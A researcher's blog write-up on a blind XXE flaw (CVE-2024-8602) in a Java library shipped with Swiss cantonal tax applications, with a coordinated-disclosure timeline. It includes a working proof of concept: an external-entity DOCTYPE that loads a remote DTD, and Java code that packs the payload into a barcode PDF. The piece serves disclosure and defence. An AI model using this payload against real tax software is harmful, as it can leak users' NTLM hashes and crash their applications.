This year I spent a little time looking at Swiss tax applications. Specifically, I looked at the 16 “official” desktop applications that allow you to do your taxes electronically. For non-Swiss readers, most of the 26 cantons (the Swiss equivalent of a state) have their own solution, that’s why there are so many clients.
This first part is going to focus on the main finding of my tax adventures: a mass XXE in a Java library included in many Swiss tax applications.
The Reocurring Jar #
All of the tax clients I looked at were programmed in Java. This meant I was able to decompile the classes and get (readable) source code back. Having source code enabled me to run a SAST tool like Semgrep↗.
I like Semgrep, as it shows me low-hanging fruits and gives me a general overview of what to expect. I actually like it so much, that I built Bagel↗, a custom web UI for it. When I looked at Semgreps output after running it against a few clients, I noticed a pattern. A particular Java class kept coming up:
ch/ewv/taxstatement/TaxStatement.java
❯❯❱ java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-
decl-missing.documentbuilderfactory-disallow-doctype-decl-missing
ch/ewv/taxstatement/examples/TaxStatementPDFToXML.java
❯❯❱ java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-
decl-missing.documentbuilderfactory-disallow-doctype-decl-missing
ch/ewv/taxstatement/pdf/TaxStatementPDF.java
❯❯❱ java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-
decl-missing.documentbuilderfactory-disallow-doctype-decl-missing
ch/ewv/taxstatement/report/TaxStatementReportSummary.java
❯❯❱ java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-
decl-missing.documentbuilderfactory-disallow-doctype-decl-missing
As an example, here is the reported code snippet of TaxStatementPDFToXML.java
:
public static void displayXML(byte[] bArr) throws IOException, ParserConfigurationException, SAXException, XPathExpressionException {
DocumentBuilderFactory newInstance = DocumentBuilderFactory.newInstance();
newInstance.setNamespaceAware(false);
Document parse = newInstance.newDocumentBuilder().parse(new ByteArrayInputStream(bArr));
System.out.println("version: " + TaxStatement.getVersion(bArr));
...
}
This ch/ewv/taxstatement
class was apparently very vulnerable to XXE↗ and was included in many of the tax applications I was looking at. A quick ripgrep↗ later, and the culprit, taxstatement.jar
was found.
rg "TaxStatementXML" --binary -g "*.jar" -l | ForEach-Object { Write-Host -NoNewline $(certutil -hashfile $_ md5)[1] && ":$_" }
1618f7a0389950c994b4f63305d77c73:sh\taxstatement-2.2.jar
1618f7a0389950c994b4f63305d77c73:tg\taxstatement-2.2.jar
a4f04f2c39cf31a7c55a22960f618f78:zh\lib\taxstatement-2.2.2.jar
a4f04f2c39cf31a7c55a22960f618f78:sg\lib\taxstatement-2.2.2.jar
1618f7a0389950c994b4f63305d77c73:gr\taxstatement-2.2.jar
2c7b537f0bda55a8f10ab2ec02c3500c:ge\taxstatement.jar
a4f04f2c39cf31a7c55a22960f618f78:bs\webapp\app\WEB-INF\lib\taxstatement-2.2.2.jar
a4f04f2c39cf31a7c55a22960f618f78:zg\lib\taxstatement-2.2.2.jar
a4f04f2c39cf31a7c55a22960f618f78:lu\webapp\app\WEB-INF\lib\taxstatement-2.2.2.jar
a4f04f2c39cf31a7c55a22960f618f78:ti\lib\taxstatement-2.2.2.jar
1618f7a0389950c994b4f63305d77c73:vs\taxstatement-2.2.jar
But what is this ominous taxstatement.jar
doing inside so many of the 16 tax applications? Especially as we know, so many cantons do their own thing!
A Government RFC #
Using the dork taxstatement.jar site:*.ch
, I found a 51-page PDF called Beilage zu eCH-196 E-Steuerauszug V2.2.0 –
Technische Wegleitung↗ or in English “Appendix for eCH-196 E-Tax Statment V2.2.0 - Technical Guide”.
This document is part of the Swiss government RFC eCH-0196↗, which outlines the technical specifications for electronic tax statement files. But what the hell are “e-tax statement files” and why would you need one?
Whilst filling out your taxes, you have to submit all your bank accounts, their taxable value, and gross revenue to your local government. If you only have a few accounts, submitting this information will not take that much time. But imagine being a company or a private trader with numerous accounts. Using such an e-tax statement file, it’s a matter of drag and drop, and all your accounts are added to the electronic tax application. No more manual typing of account numbers, revenue, and co.
Such an e-tax statement file is, at its core, XML data (you can see where this is going), containing the following information:
- Bank name and the bank’s unique identifier (
lei
) - Personal data to identify the account holder (you, the taxpayer)
- Each account with detailed data like taxable value and gross revenue
It looks like this:
<?xml version="1.0" encoding="ISO-8859-1" standalone='no'?>
<taxStatement xmlns="http://www.ech.ch/xmlns/eCH-0196/2" xmlns:eCH-0097="http://www.ech.ch/xmlns/eCH-0097/4" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" xsi:schemaLocation="http://www.ech.ch/xmlns/eCH-0196/2 http://www.ech.ch/xmlns/eCH-0196/2/eCH-0196-2-0.xsd" id="CH0000000000000000000000000000" minorVersion="21" creationDate="2024-01-01T16:20:42" taxPeriod="2023" periodFrom="2023-01-01" periodTo="2023-12-31" country="CH" canton="LU" totalTaxValue="1337.0" totalGrossRevenueA="0" totalGrossRevenueB="0" totalWithHoldingTaxClaim="0">
<institution lei="424242AB1CD2EFGH3IJ4" name="Hacker Bank">
<lol></lol>
<uid>
<eCH-0097:uidOrganisationIdCategorie>CHE</eCH-0097:uidOrganisationIdCategorie>
<eCH-0097:uidOrganisationId>123456789</eCH-0097:uidOrganisationId>
</uid>
</institution>
<client clientNumber="133.713" salutation="2" firstName="Super" lastName="Hacker"/>
<listOfBankAccounts totalTaxValue="1337.0" totalGrossRevenueA="0" totalGrossRevenueB="0" totalWithHoldingTaxClaim="0">
<bankAccount iban="CH2100000000000000000" bankAccountNumber="133.713-370" bankAccountName="Super Secure Vault" bankAccountCountry="CH" bankAccountCurrency="CHF" totalTaxValue="1337.0" totalGrossRevenueA="0" totalGrossRevenueB="0" totalWithHoldingTaxClaim="0">
<taxValue referenceDate="2023-12-31" balanceCurrency="CHF" balance="1337.00" exchangeRate="1" value="1337.00"/>
<payment paymentDate="2023-12-31" name="Habenzins ohne Verrechnungssteuer" amountCurrency="CHF" amount="0" exchangeRate="1" grossRevenueA="0" grossRevenueB="0" withHoldingTaxClaim="0"/>
</bankAccount>
</listOfBankAccounts>
</taxStatement>
But handing out XML data to (non-technical) customers isn’t very user-friendly. That’s why the RFC specifies a barcode standard, into which the XML data is serialized. A PDF containing such barcodes is the final e-tax statement file a financial institution like your bank hands out to you.
This PDF↗, provided by SSK (hold on to that name), shows a preview of such codes. (the ones on the right)
Top Secret Jar File #
Imagine being a (Java) developer who has to implement this RFC as a feature into, for example, a banking application you’re working on. You read through the RFC and find the following text in the technical guide on how to generate codes↗:
Die Quellen, Java Doc und Beispiele stehen ebenfalls über die nachfolgende URL in der Datei taxstatement-api-2.2.zip zur Verfügung. https://esteuer.ewv-ete.ch/de/api/
You click on this link expecting a Java library, but your browser only gives you an HTTP 404 error:
You cannot actually download this jar file. At least not directly. The reason for this is not outlined in the PDFs but using the magic of search engines again, I found this post↗ on a Swiss trading forum.
I asked the people that are responsible for the standard [2], but they told me they only give out that information to cantons and banks… could have otherwise been a cool project.
Let me introduce you to the SSK↗ (Schweizerischen Steuerkonferenz), or in English, the “Swiss Tax Conference”. This interest group is responsible for managing the RFC and their members consist of a few non-technical people and mostly developers/managers of companies developing existing tax applications.
It turns out, the SSK only gives you the jar file if you are a canton or a bank. I’m hoping that the SSK knows that Java applications include their libraries once you distribute them… in any case, have fun↗.
$$$ to XXE #
Well, you read the title and saw Semgrep’s output. The whole RFC eCH-0196 v2.2.0 (implemented in the official taxstatement.jar
) is vulnerable to XXE↗.
Fun fact: Neither the RFC, the technical guide or the guide on generating codes mention the word “security” (in an app security context) or the word “doctype” once.
Creating a PoC for the XEE vulnerability started by calling my bank. Since I did not find any example XML data on the World Wide Web, I had the ask my bank to generate me some. There was only one problem. The PDF generation feature was not available at the moment.
I explained the situation (I’m a developer and need some “test data”) to the nice lady at the other end of the phone, and she actually gave a fuck. After putting me on hold, she came back to me with the good news from her boss saying that she would send me some sample data. I did not expect that to be honest. Kudos! Following the slight social engineering, crafting the XXE was actually pretty easy. I just added an external entity to the top of the e-tax statement XML data.
<?xml version="1.0" encoding="ISO-8859-1" standalone='no'?>
<!DOCTYPE demo [
<!ELEMENT demo ANY >
<!ENTITY % extentity SYSTEM "http://192.168.56.6:9999/stage1/haecks2.dtd">
%extentity;
%intern;
]
>
<taxStatement xmlns="http://www.ech.ch/xmlns/eCH-0196/2"...
Now came the harder part. Since the tax applications only accept this data in barcode form, I needed to generate a PDF from the XML above. It took me some time, but here is the main part of the final code that I used to generate a PDF containing the XXE:
// java -jar .\taxsploit.jar demo_data.xml
public static void main(String[] args) throws Exception {
File file = new File(args[0]);
if (!file.exists() || file.isDirectory()) {
throw new FileNotFoundException("File " + args[0] + " not found!");
}
try {
// Read the XML file
byte[] xml = Files.readAllBytes(file.toPath());
// Generate the barcodes from the XML
BufferedImage[] images = TaxStatement.barCodeXML(xml);
// Create a new PDF and a blank page
PDDocument document = new PDDocument();
PDPage blankPage = new PDPage();
// Since the "official PDFs" are all rotated, we do the same
blankPage.setRotation(90);
// Add the barcode to the page
TaxStatement.addBarCode(document, blankPage, images, 1);
// Save the PDF
document.save("output.pdf");
document.close();
// To verify that the generation has worked, also save the barcodes on their own
// Those can be looked at using a barcode decoder
for (int i = 0; i < images.length; i++) {
File outpic = new File(String.format("output_%d.png", i));
ImageIO.write(images[i], "png", outpic);
}
} catch (Exception e) {
e.printStackTrace();
}
}
To compile this code, you need taxstatement.jar
and some other dependencies outlined in the technical documentation for generating codes↗. When running this, you get a nice PDF containing the XML data serialized into barcodes:
Afterward, I booted my tax VM and started throwing the PoC at all tax applications I knew shipped with taxstatement.jar
. To my surprise, this worked on the first try. Here is the XXE in action for the cantons of Lucerne and Zurich:
Vulnerable Applications #
Here are all the vulnerable applications I found:
Canton | Vendor | App | Version | Vulnerable |
---|---|---|---|---|
BS | Information Factory | BalTax.2023 | 1.4.0 | yes |
GE | DV Bern | GeTax 2023 | 2023-1.0.3 | yes |
GR | Abraxas | SofTax GR 2023 NP | 1.0.7.52 | probably* |
LU | Information Factory | steuern.lu.2023 nP | 1.1.0 | yes |
SG | Information Factory | Steuer St. Gallen 2023 nP | 1.4.0 | yes |
SH | Abraxas | Steuern23 | 1.0.6.62 | yes |
TG | Abraxas | eFisc2024 | 1.0.0.43 | yes |
TI | Information Factory | eTax.ticino PF 2023 | 1.3.0 | yes |
VS | Abraxas | VSTax 2023 | 1.0.6.89 | probably* |
ZG | Information Factory | eTax.zug 2023 nP | 1.4.0 | yes |
ZH | Information Factory | Private Tax 2023 | 1.5.0 | yes |
*Sometimes, you need a personal access code/ID to be able to fill out tax forms. For SofTax GR and VSTax, I was not able to crack the algorithm to keygen me an ID, but since it is the same Abraxas codebase, they should be vulnerable.
Double Render All the Way #
Some applications will trigger the XXE twice as they use taxstatement.jar
to get raw XML from the PDF and then feed this into their own, vulnerable DocumentParser
. Thus, after SSK patches the library, they would still be vulnerable. This is because disallow-doctype-dec
does not sanitize/strip the exploit parts out of the XML, it just prevents them from being rendered.
Impact #
From my point of view, there isn’t that much impact. You’re fairly limited on what you can do with this blind XXE, especially as the main targets are standalone, single-user Windows computers.
- You can leak NTLM(v2) hashes, which could be crackable
- You can make simple HTTP GET request
- You can crash the tax application
Leaking NTLM hashes by opening DTDs on a remote SMB share is probably the best loot you can hope for, especially as I was not able to leak a file, and in my humble opinion, making simple HTTP GET requests does not have that much impact in 2024.
That said, the main problem I still see is that taxstatement.jar
is a library that is used god knows where. On a server, inside a web application, this might have more impact.
The Aftermath #
As SSK↗ was responsible for the RFC, I started the CVD (coordinated vulnerability disclosure) process by contacting them. What followed was a back-and-forth e-mail chain of which you can see the timeline below.
My contact person (non-technical) was very stubborn in ignoring my request for direct contact between me and the responsible, technical person. They also never accepted my offer for a phone call, which would have made explaining some things easier. In the middle of the conversation, they even changed their standpoints from “yes, we will fix it” to “we need to verify the vulnerability first”.
After two months and a few emails, I was fed up and contacted the Swiss GovCERT BACS↗ because I wanted things to move forward, which they did. I do not have insights into the communication between the vendor and the BACS but hey, they reserved CVE-2024-8602, and after another month of waiting, the CVE became public.
Timeline
- 21.06.2024: Found vulnerability, initial contact via email from website, asked for a technical/security contact
- 24.06.2024: Got a response asking for details
- 24.06.2024: Sent details with a grace period of 90d (after the fix is available)
- 30.06.2024: Asked for an update
- 08.07.2024: Asked for an update with the deadline for BACS contact set to 14.07.2024
- 09.07.2024: Got a response saying they’ll fix it in version 2.2.4, no release date, no CVE, almost no questions answered
- 12.07.2024: Sent a response with 5 more open points/questions
- 17.07.2024: Got a response saying they are still evaluating it and checking if it is even a vulnerability
- 18.07.2024: Sent a response with more open points/questions and asked the 3rd time for a phone call
- 18.07.2024: Got an out-of-office email (until 19.07)
- 18.08.2024: Contacted BACS with details about the case as it was not going forward with the vendor
- 21.08.2024: Got a response from BACS telling me they are looking into it and contacting the vendor
- 05.09.2024: Got a response from BACS telling me they are “negotiating” with a 3rd party who was put in charge by the vendor
- 09.09.2024: Got a response from BACS telling me they reserved CVE-2024-8602
- 09.09.2024: Replied with a response to their questions and asked a question about the publication date
- 09.09.2024: Got a response from BACS telling me they are still “negotiating” with a 3rd party
- 20.09.2024: Got a response from BACS telling me they are still “negotiating” with a 3rd party
- 20.09.2024: Replied with a question about their “negotiation” and the 3rd party
- 23.09.2024: Got a response from BACS telling me that the 3rd party is a security company put in charge by the vendor and they are also not super responsive
- 04.10.2024: Got a response from BACS telling me that they still have not heard back from the 3rd party
- 09.10.2024: SSK puts out a newsletter↗ informing their users about the vulnerability and that it’s fixed in version 2.2.4.1 (CVE and double render vulnerability not mentioned)
- 14.10.2024: Got a response from BACS telling me that CVE-2024-8602↗ is now public
The End #
At the end of the day, from my point of view, the vulnerability was just a blind, client-side XXE without much impact. Considering myself a good häcker, I did my due diligence in the form of a CVD and treated this the same way I would treat a more severe vulnerability.
Why this took so long to fix, why a 3rd party security company was involved, and why the vulnerability announcement contained almost no information is beyond me. Let’s remind ourselves, this is at most, a three to four-line fix per DocumentParser↗.
My goal of a BSides Bern 2024↗ talk quickly vanished, but I did not want to tease↗ something that I’ll never publish, so here we are. Thanks to the Swiss GovCERT BACS for dealing with the vendor, thanks to @_cydave↗ for proofreading parts of this, and thank you for reading this post.
See you soon with more Swiss tax shenanigans,
Cheers